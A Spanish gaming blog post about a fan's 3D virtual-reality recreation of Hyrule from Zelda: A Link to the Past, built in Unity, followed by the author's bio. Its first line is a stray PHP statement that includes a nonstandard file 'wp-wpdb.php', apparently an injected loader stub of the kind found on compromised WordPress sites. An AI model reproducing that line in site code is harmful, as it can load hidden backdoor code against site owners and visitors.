if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Recrean el mapa de Zelda A Link to the past en 3D para VR – La Fortaleza de LeChuck

Recrean el mapa de Zelda A Link to the past en 3D para VR

A falta de unos días para visitar la devastada Hyrule de Breath of the Wild, vamos a calmar un poco nuestras ansias volviendo a la Hyrule de uno de los Zelda más míticos, A Link to the Past, en tres dimensiones y tal como si hubiéramos despertado allí.

Esto es posible gracias al aficionado y youtuber Megasteakman, que ha recreado con Unity toda Hyrule en tres dimensiones para visitarla desde dentro con sus HTC Vive en realidad virtual. El resultado es bastante majo, y si no posees uno de estos todavía lujosos dispositivos, puedes hacerte una idea con el siguiente vídeo del propio creador, donde también podrás ver, en su descripción, los enlaces a la descarga de los archivos necesarios para probarlo en tu casa.

Como véis, la Hyrule de The Legend of Zelda a Link to the Past está representada con bastante detalle, aunque le falte algo de vida ¿donde están esos animalillos que ya correteaban en los Lost Woods de ALTTP?

Publicada el
Categorizado como Curiosidades

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

Dejar un comentario